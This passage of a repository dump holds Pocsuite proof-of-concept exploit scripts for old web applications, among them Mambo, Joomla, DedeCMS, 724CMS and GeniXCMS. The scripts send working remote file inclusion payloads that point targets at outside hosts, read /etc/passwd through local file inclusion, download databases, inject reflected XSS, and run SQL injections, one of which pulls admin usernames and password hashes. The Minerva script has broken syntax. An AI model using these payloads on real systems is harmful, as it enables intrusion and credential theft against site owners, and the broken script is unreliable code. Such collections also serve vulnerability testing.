32 | vul_url = '%s/pop.php?base=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(MyABraCaDaWeb_Remote_File_Include)
--------------------------------------------------------------------------------
/galleria Mambo Module _= 1.0b Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import Output, POCBase
6 | from pocsuite.utils import register
7 |
8 | class TestPOC(POCBase):
9 | vulID = '63674' # ssvid
10 | version = '1.0'
11 | author = ['皮皮']
12 | vulDate = '2006-07-03'
13 | createDate = '2015-12-24'
14 | updateDate = '2015-12-24'
15 | references = ['http://www.sebug.net/vuldb/ssvid-63674']
16 | name = 'Pearl For Mambo <= 1.6 - Multiple Remote File Include Vulnerabilities'
17 | appPowerLink = ''
18 | appName = 'galleria Mambo Module'
19 | appVersion = '<= 1.0b'
20 | vulType = 'Remote File Inclusion'
21 | desc = ''
22 | samples = ['']
23 |
24 |
25 | def _attack(self):
26 | return self._verify()
27 |
28 |
29 | def _verify(self):
30 | result = {}
31 | vul_url = '%s/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://baidu.com/robots.txt' % self.url
32 | response = req.get(vul_url).content
33 |
34 | if 'Baiduspider' in response and 'Googlebot' in response:
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['URL'] = self.url
37 |
38 | return self.parse_attack(result)
39 |
40 |
41 | def parse_attack(self, result):
42 | output = Output(self)
43 |
44 | if result:
45 | output.success(result)
46 | else:
47 | output.fail('failed')
48 |
49 | return output
50 |
51 | register(TestPOC)
52 |
--------------------------------------------------------------------------------
/AlstraSoft EPay Pro 2.0 - Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class AlstraSoft_EPay_Pro_Remote_File_Include(POCBase):
10 | vulID = '78990'
11 | version = '1'
12 | vulDate = '2005-04-01'
13 | author = ' '
14 | createDate = '2015-12-16'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-78990']
17 | name = 'AlstraSoft EPay Pro 2.0 - Remote File Include Vulnerability'
18 | appPowerLink = ''
19 | appName = 'AlstraSoft EPay Pro'
20 | appVersion = '2.0'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/epal/index.php?view=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(AlstraSoft_EPay_Pro_Remote_File_Include)
--------------------------------------------------------------------------------
/Angelo-emlak 1.0 - Database Disclosure Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 | import re
4 | from pocsuite.net import req
5 | from pocsuite.poc import Output, POCBase
6 | from pocsuite.utils import register
7 |
8 |
9 | class Angelo_emlak_Database_Found(POCBase):
10 | vulID = '67229'
11 | version = '1'
12 | vulDate = '2010-04-27'
13 | author = 'anonymous'
14 | createDate = '2015-11-15'
15 | updateDate = '2015-11-15'
16 | references = ['http://www.sebug.net/vuldb/ssvid-67229']
17 | name = 'Angelo-emlak 1.0 - Database Disclosure Vulnerability'
18 | appPowerLink = ''
19 | appName = 'Angelo-emlak'
20 | appVersion = ' '
21 | vulType = 'Database Found'
22 | desc = 'Angelo-Emlak在web根目录下保存敏感信息,但缺乏足够的访问控制,远程攻击者可以通过直接向veribaze/angelo.mdb发出请求,下载数据库。'
23 | samples = ['http://burdurdaemlak.com']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/veribaze/angelo.mdb' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('Standard Jet DB', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 | return self.parse_attack(result)
40 |
41 |
42 | def parse_attack(self, result):
43 | output = Output(self)
44 |
45 | if result:
46 | output.success(result)
47 | else:
48 | output.fail('failed')
49 |
50 | return output
51 |
52 | register(Angelo_emlak_Database_Found)
--------------------------------------------------------------------------------
/KISGB _= (tmp_theme) 5.1.1 - Local File Inclusion Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 |
4 |
5 |
6 | from pocsuite.net import req
7 | from pocsuite.poc import Output, POCBase
8 | from pocsuite.utils import register
9 |
10 |
11 |
12 | class TestPOC(POCBase):
13 | vulID = '65284'
14 | version = '1'
15 | vulDate = '1206806400'
16 | createDate = '1442937600'
17 | references = ['http://www.sebug.net/vuldb/ssvid-65284']
18 | name = 'KISGB Local File Inclusion'
19 | appPowerLink = 'http://sourceforge.net/projects/kisgb/'
20 | appName = 'KISGB (Keep It Simple Guest Book)'
21 | appVersion = '<=5.1.1'
22 | vulType = 'Local File Inclusion'
23 | desc = '''KISGB view_private.php文件在处理传入的参数时存在缺陷,导致产生本地文件包含漏洞。'''
24 | samples = ['']
25 |
26 |
27 | def _attack(self):
28 | return self._verify()
29 |
30 |
31 | def _verify(self, verify=True):
32 | result = {}
33 | vul_url = '%s/view_private.php?start=1&action=edit&tmp_theme=../../../../../../etc/passwd' % self.url
34 | response = req.get(vul_url, timeout=10).content
35 |
36 |
37 | if '/bin/bash' in response:
38 | result['VerifyInfo'] = {}
39 | result['VerifyInfo']['URL'] = self.url
40 |
41 | return self.parse_attack(result)
42 |
43 |
44 |
45 | def parse_attack(self, result):
46 | output = Output(self)
47 |
48 |
49 | if result:
50 | output.success(result)
51 | else:
52 | output.fail('failed')
53 |
54 |
55 | return output
56 | register(TestPOC)
--------------------------------------------------------------------------------
/dotWidget CMS _= 1.0.6 (file_path) Remote File Include Vulnerabilities.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class dotWidget_CMS_Remote_File_Include(POCBase):
10 | vulID = '63616'
11 | version = '1'
12 | vulDate = '2006-06-05'
13 | author = ' '
14 | createDate = '2015-12-16'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-63616']
17 | name = 'dotWidget CMS <= 1.0.6 (file_path) Remote File Include Vulnerabilities'
18 | appPowerLink = ''
19 | appName = 'dotWidget CMS'
20 | appVersion = '<= 1.0.6'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/index.php?file_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(dotWidget_CMS_Remote_File_Include)
--------------------------------------------------------------------------------
/Hitweb _= 4.2.1 (REP_INC) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class Hitweb_Remote_File_Include(POCBase):
10 | vulID = '63807'
11 | version = '1'
12 | vulDate = '2006-08-08'
13 | author = ' '
14 | createDate = '2015-12-17'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-63807']
17 | name = 'Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability'
18 | appPowerLink = 'http://freshmeat.net/redir/hitweb/15633/url_tgz/hitweb-4.2_php.tgz'
19 | appName = 'Hitweb'
20 | appVersion = '<= 4.2.1'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/genpage-cgi.php?REP_INC=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(Hitweb_Remote_File_Include)
--------------------------------------------------------------------------------
/Minerva _= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
8 | class TestPOC(POCBase):
9 | vulID = '64022' # ssvid
10 | version = '1.0'
11 | author = ['皮皮']
12 | vulDate = '2006-09-28'
13 | createDate = '2015-12-24'
14 | updateDate = '2015-12-24'
15 | references = ['http://www.sebug.net/vuldb/ssvid-64022']
16 | name = 'Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability'
17 | appPowerLink = 'http://prdownloads.sourceforge.net/minerva/Minerva-238a.zip?download'
18 | appName = 'Minerva'
19 | appVersion = '<= 2.0.21'
20 | vulType = 'Remote File Inclusion'
21 | desc = ''
22 | samples = ['']
23 |
24 |
25 | def _attack(self):
26 | return self._verify()
27 |
28 |
29 | def _verify(self):
30 | result = {}
31 | vul_url = '%s/admin/admin_topic_action_logging.php?setmodules=attach&phpbb_root_path=http://?' % self.url
32 | res = req.get(vul_url)
33 |
34 | if 'Baiduspider' in res.content and 'Googlebot': in res.content
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['URL'] = self.url
37 |
38 | return self.parse_attack(result)
39 |
40 |
41 | def parse_attack(self, result):
42 | output = Output(self)
43 |
44 | if result:
45 | output.success(result)
46 | else:
47 | output.fail('failed')
48 |
49 | return output
50 |
51 | register(TestPOC)
--------------------------------------------------------------------------------
/GeniXCMS 0.0.3 - XSS Vulnerabilities.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | # Download Link: https://www.exploit-db.com/apps/969a9a0c12a219fb5e3658eeaff4e426-GeniXCMS-v0.0.3.zip
4 |
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase, Output
7 | from pocsuite.utils import register
8 |
9 |
10 | class TestPOC(POCBase):
11 | vulID = '89322' # vul ID
12 | version = '1'
13 | author = 'p9k4r'
14 | vulDate = '2015-06-21'
15 | createDate = '2015-10-12'
16 | updateDate = '2015-10-12'
17 | references = 'https://packetstormsecurity.com/files/132397/GeniXCMS-0.0.3-Cross-Site-Scripting.html'
18 | name = 'GeniXCMS 0.0.3 - XSS Vulnerabilities'
19 | appPowerLink = 'http://www.genixcms.org'
20 | appName = 'genixcms'
21 | appVersion = '0.0.3'
22 | vulType = ' XSS '
23 | desc = '''
24 | gxadmin/index.php 页面参数 q 存在反射性XSS
25 | '''
26 |
27 | def _verify(self):
28 | path = self.url + "/gxadmin/index.php?page=posts&q=1'SEBUG@NET
"
29 | res = req.get(path)
30 | return self.parse_verify(res)
31 |
32 | def parse_verify(self, res):
33 | output = Output(self)
34 | result = {}
35 |
36 | if res.status_code == 200 and 'SEBUG@NET
' in res.content:
37 | result['VerifyInfo'] = {}
38 | result['VerifyInfo']['URL'] = res.url
39 | output.success(result)
40 |
41 | else:
42 | output.fail('Internet Nothing returned')
43 |
44 | return output
45 |
46 | def _attack(self):
47 |
48 | return self._verify()
49 |
50 |
51 | register(TestPOC)
52 |
--------------------------------------------------------------------------------
/Joomla Spider Form Maker _= 3.4 - SQLInjection.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 | from pocsuite.net import req
4 | from pocsuite.poc import Output, POCBase
5 | from pocsuite.utils import register
6 |
7 |
8 | class TestPOC(POCBase):
9 | vulID = '87285'
10 | version = '1'
11 | vulDate = '2014-09-07'
12 | author = 'anonymous'
13 | createDate = '2015-09-30'
14 | updateDate = '2015-09-30'
15 | references = ['http://www.sebug.net/vuldb/ssvid-87285']
16 | name = 'Joomla Spider Form Maker SQL Injection '
17 | appPowerLink = 'http://www.joomlaboat.com/youtube-gallery'
18 | appName = 'Joomla Spider Form Maker'
19 | appVersion = '<= 3.4'
20 | vulType = 'SQL Injection'
21 | desc = 'Joomla Spider Form Maker SQL Injection in id'
22 | samples = ['']
23 |
24 |
25 | def _attack(self):
26 | return self._verify()
27 |
28 |
29 | def _verify(self, verify=True):
30 | result = {}
31 | payload = '||exp(~(select*from(select md5(456546))a))'
32 | vul_url = '%s/index.php?option=com_formmaker&view=formmaker&id=1' % self.url
33 | response = req.get(vul_url + payload).content
34 |
35 | if 'e02f052b7d3db73f99d4f5801f2b6fff' in response:
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 | return self.parse_attack(result)
40 |
41 |
42 | def parse_attack(self, result):
43 | output = Output(self)
44 |
45 | if result:
46 | output.success(result)
47 | else:
48 | output.fail('failed')
49 |
50 | return output
51 |
52 | register(TestPOC)
--------------------------------------------------------------------------------
/MunkyScripts Simple Gallery SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 | import re
7 |
8 | class TestPOC(POCBase):
9 | vulID = '68151' # ssvid
10 | version = '1.0'
11 | author = ['0xFATeam']
12 | vulDate = ''
13 | createDate = '2016-01-08'
14 | updateDate = '2016-01-08'
15 | references = ['http://www.sebug.net/vuldb/ssvid-68151']
16 | name = 'MunkyScripts Simple Gallery SQL Injection Vulnerability'
17 | appPowerLink = ''
18 | appName = 'MunkyScripts Simple Gallery'
19 | appVersion = ''
20 | vulType = 'Other'
21 | desc = '''
22 | '''
23 | samples = ['']
24 |
25 | def _verify(self):
26 | payload = "/gallery.php?cid='/**/UNION/**/SELECT/**/1,2,(concat_ws(0x3a,md5(1))),4 %23"
27 | response = req.get(self.url + payload)
28 | return self.parse_output(response)
29 |
30 | def _attack(self):
31 | result = {}
32 | #Write your code here
33 |
34 | return self._verify(self)
35 |
36 | def parse_output(self, response):
37 | output = Output(self)
38 | result = {}
39 |
40 | if response:
41 | m = re.search(r'c4ca4238a0b923820dcc509a6f75849b', response.content)
42 | if m:
43 | result['VerifyInfo'] = {}
44 | result['VerifyInfo']['URL'] = response.url
45 | output.success(result)
46 | else:
47 | output.fail('Internet Nothing Returned')
48 |
49 | return output
50 |
51 |
52 | register(TestPOC)
--------------------------------------------------------------------------------
/interact _= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class interact_Remote_File_Include(POCBase):
10 | vulID = '63658'
11 | version = '1'
12 | vulDate = '2006-08-19'
13 | author = ' '
14 | createDate = '2015-12-16'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-63658']
17 | name = 'interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability'
18 | appPowerLink = 'https://sourceforge.net/projects/cce-interact/'
19 | appName = 'interact'
20 | appVersion = '<= 2.2'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/admin/autoprompter.php?CONFIG[BASE_PATH]=[http://tool.scanv.com/wsl/php_verify.txt?]' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(interact_Remote_File_Include)
--------------------------------------------------------------------------------
/mambo com_babackup Component _= 1.1 File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 | from pocsuite.net import req
4 | from pocsuite.poc import POCBase, Output
5 | from pocsuite.utils import register
6 |
7 |
8 | class TestPOC(POCBase):
9 | vulID = '63864' # ssvid
10 | version = '1.0'
11 | author = ['皮皮']
12 | vulDate = '2006-08-22'
13 | createDate = '2015-12-24'
14 | updateDate = '2015-12-24'
15 | references = ['http://www.sebug.net/vuldb/ssvid-63864']
16 | name = 'mambo com_babackup Component <= 1.1 File Include Vulnerability'
17 | appPowerLink = 'http://mamboxchange.com/frs/download.php/5072/com_babackup_1.1.zip'
18 | appName = 'mambo com_babackup Component'
19 | appVersion = '<= 1.1'
20 | vulType = 'Remote File Inclusion'
21 | desc = ''
22 | samples = ['']
23 |
24 |
25 | def _attack(self):
26 | return self._verify()
27 |
28 |
29 | def _verify(self):
30 | result = {}
31 | vul_url = '%s/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://baidu.com/robots.txt?' % self.url
32 | response = req.get(vul_url).content
33 |
34 | if 'Googlebot' in response and 'Baiduspider' in response:
35 | result['VerifyInfo'] = {}
36 | result['VerifyInfo']['URL'] = self.url
37 |
38 | return self.parse_attack(result)
39 |
40 |
41 | def parse_attack(self, result):
42 | output = Output(self)
43 |
44 | if result:
45 | output.success(result)
46 | else:
47 | output.fail('failed')
48 |
49 | return output
50 |
51 | register(TestPOC)
--------------------------------------------------------------------------------
/ecoCMS 18.4.2010 'admin.php' Cross Site Scripting Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 | from urlparse import urljoin
8 |
9 | class TestPOC(POCBase):
10 | vulID = 'SSV-87089' # vul ID
11 | version = '1'
12 | author = 'fenghh'
13 | vulDate = '2010-05-18'
14 | createDate = '2015-10-17'
15 | updateDate = '2015-10-17'
16 | references = ['https://www.exploit-db.com/exploits/33925/']
17 | name = "ecoCMS 18.4.2010 - 'admin.php' Cross-Site Scripting Vulnerability"
18 | appPowerLink = 'http://www.ecocms.com/'
19 | appName = 'ecoCMS'
20 | appVersion = '18.4.2010'
21 | vulType = 'XSS'
22 | desc = '''
23 | ecoCMS的admin.php中存在跨站脚本漏洞。远程攻击者可借助p参数注入任意web脚本或者HTML。
24 | '''
25 | # the sample sites for examine
26 | samples = ['']
27 |
28 | def _verify(self):
29 | payload_xss = "/admin.php?p=1%22%3E%3Cscript%3Ealert%28/SebugTest/%29%3C/script%3E"
30 | res = req.get(urljoin(self.url, payload_xss), timeout=5)
31 | return self.parse_verify(res)
32 |
33 | def parse_verify(self, res):
34 | output = Output(self)
35 | result = {}
36 | if '>alert(/SebugTest/)' in res.content:
37 | result['VerifyInfo'] = {}
38 | result['VerifyInfo']['URL'] = self.url
39 | output.success(result)
40 | else:
41 | output.fail('Internet Nothing returned')
42 | return output
43 |
44 | def _attack(self):
45 | return self._verify()
46 |
47 | register(TestPOC)
--------------------------------------------------------------------------------
/dede_search.php_sqli.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | #!coding: utf-8
3 | import re
4 |
5 | from pocsuite.net import req
6 | from pocsuite.poc import POCBase,Output
7 | from pocsuite.utils import register
8 |
9 | class Fuckdede(POCBase):
10 | vulID='4'
11 | version = '1'
12 | author = ['fengxuan']
13 | vulDate = '2016-2-4'
14 | createDate = '2016-2-4'
15 | updateDate = '2016-2-4'
16 | references = ['http://www.evalshell.com', 'http://zone.wooyun.org/content/2414']
17 | name = 'dedecms plus/search.php 注入漏洞利用EXP'
18 | appPowerLink = 'http://www.dedecms.cn/'
19 | appName = 'dedecms'
20 | appVersion = '5.7'
21 | vulType = 'SQL Injection'
22 | desc = '''
23 | 开发人员在修补漏洞的时候只修复了少数的变量而遗漏了其他变量,使其他变量直接
24 | 带入了SQL语句中,可以通过\字符来转义掉一个单引号,逃逸单引号,产生SQL注入。
25 | 此注入为报错注入,可以通过UpdateXML函数进行注入。
26 | '''
27 | samples = ['']
28 |
29 | def _verify(self):
30 | result = {}
31 | target = self.url + "plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60%23@__admin%60%23@%60\%27%60+]=a"
32 | response = req.get(target)
33 | content = response.content
34 | if 'DedeCMS Error Warning!' in content:
35 | result = {'VerifyInfo':{}}
36 | result['VerifyInfo']['URL'] = self.url
37 | return self.parse_result(result)
38 |
39 | def _attack(self):
40 | return self._verify()
41 |
42 | def parse_result(self, result):
43 | output = Output(self)
44 |
45 | if result:
46 | output.success(result)
47 | else:
48 | output.fail("Internet Nothing returned")
49 | return output
50 |
51 | register(Fuckdede)
52 |
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/Limbo CMS Module event 1.0 - Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class Limbo_CMS_Module_event_Remote_File_Include(POCBase):
10 | vulID = '64366'
11 | version = '1'
12 | vulDate = '2006-12-27'
13 | author = ' '
14 | createDate = '2015-12-19'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-64366']
17 | name = 'Limbo CMS Module event 1.0 - Remote File Include Vulnerability'
18 | appPowerLink = 'http://www.limbo-tr.com/images/downloads/event.zip'
19 | appName = 'Limbo CMS Module event'
20 | appVersion = '1.1'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/eventcal/mod_eventcal.php?lm_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(Limbo_CMS_Module_event_Remote_File_Include)
--------------------------------------------------------------------------------
/724CMS _= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | from pocsuite.net import req
5 | from pocsuite.poc import POCBase, Output
6 | from pocsuite.utils import register
7 |
8 | class TestPOC(POCBase):
9 | vulID = 'SSV-65307' # vul ID
10 | version = '1'
11 | author = ['hh']
12 | vulDate = '2008-04-07'
13 | createDate = '2015-10-16'
14 | updateDate = '2015-10-16'
15 | references = ['https://www.exploit-db.com/exploits/5400/']
16 | name = '724CMS <= 4.01 Enterprise (index.php ID) SQL Injection Vulnerability'
17 | appPowerLink = 'http://724cms.com/'
18 | appName = '724cms'
19 | appVersion = '<= 4.01'
20 | vulType = 'SQL Injection'
21 | desc = '''
22 | 724Networks 724CMS 4.01及其早期版本的index.php存在SQL注入漏洞。远程攻击者通过ID参数来执行任意SQL命令。
23 | '''
24 | # the sample sites for examine
25 | samples = ['']
26 |
27 | def _verify(self):
28 | result = {}
29 | payload = "/index.php?ID=1 UNION SELECT 1,md5(666),3,4,5,6,7,8--"
30 | verify_url = self.url + payload
31 | content = req.get(verify_url).content
32 | if 'fae0b27c451c728867a567e8c1bb4e53' in content:
33 | result['VerifyInfo'] = {}
34 | result['VerifyInfo']['URL'] = verify_url
35 | return self.parse_verify(result)
36 |
37 | def _attack(self):
38 | return self._verify()
39 |
40 | def parse_verify(self, result):
41 | output = Output(self)
42 | if result:
43 | output.success(result)
44 | else:
45 | output.fail('Internet Nothing returned')
46 | return output
47 |
48 | register(TestPOC)
--------------------------------------------------------------------------------
/Mambo cropimage Component _= 1.0 - Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class Mambo_cropimage_Component_Remote_File_Include(POCBase):
10 | vulID = '63857'
11 | version = '1'
12 | vulDate = '2006-08-19'
13 | author = ' '
14 | createDate = '2015-12-16'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-63857']
17 | name = 'Mambo cropimage Component <= 1.0 - Remote File Include Vulnerability'
18 | appPowerLink = ''
19 | appName = 'Mambo cropimage Component'
20 | appVersion = '<= 1.0'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(Mambo_cropimage_Component_Remote_File_Include)
--------------------------------------------------------------------------------
/Joomla Kochsuite Component _= 0.9.4 - Remote File Include Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # coding: utf-8
3 |
4 | import re
5 | from pocsuite.net import req
6 | from pocsuite.poc import Output, POCBase
7 | from pocsuite.utils import register
8 |
9 | class Joomla_Kochsuite_Component_Remote_File_Include(POCBase):
10 | vulID = '63855'
11 | version = '1'
12 | vulDate = '2006-10-17'
13 | author = ' '
14 | createDate = '2015-12-16'
15 | updateDate = ' '
16 | references = ['http://www.sebug.net/vuldb/ssvid-63855']
17 | name = 'Joomla Kochsuite Component <= 0.9.4 - Remote File Include Vulnerability'
18 | appPowerLink = ''
19 | appName = 'Joomla Kochsuite Component'
20 | appVersion = '<= 0.9.4'
21 | vulType = 'Remote File Inclusion'
22 | desc = ''
23 | samples = ['']
24 |
25 |
26 | def _attack(self):
27 | return self._verify()
28 |
29 |
30 | def _verify(self):
31 | result = {}
32 | vul_url = '%s/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://tool.scanv.com/wsl/php_verify.txt?' % self.url
33 | response = req.get(vul_url).content
34 |
35 | if re.search('d4d7a6b8b3ed8ed86db2ef2cd728d8ec', response):
36 | result['VerifyInfo'] = {}
37 | result['VerifyInfo']['URL'] = self.url
38 |
39 |
40 | return self.parse_attack(result)
41 |
42 |
43 | def parse_attack(self, result):
44 | output = Output(self)
45 |
46 | if result:
47 | output.success(result)
48 | else:
49 | output.fail('failed')
50 |
51 | return output
52 |
53 | register(Joomla_Kochsuite_Component_Remote_File_Include)
--------------------------------------------------------------------------------
/DirPHP 1.0 - LFI Vulnerability.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | # -*- coding:utf-8 -*-
3 |
4 |
5 |
6 | from pocsuite.net import req
7 |
8 | from pocsuite.poc import Output, POCBase
9 |
10 | from pocsuite.utils import register
11 |
12 |
13 |
14 | class TestPOC(POCBase):
15 |
16 | vulID = '87159'
17 |
18 | version = '1'
19 |
20 | vulDate = '1406390400'
21 |
22 | createDate = '1442937600'
23 |
24 | references = ['http://www.sebug.net/vuldb/ssvid-87159']
25 |
26 | name = 'DirPHP LFI Vulnerability'
27 |
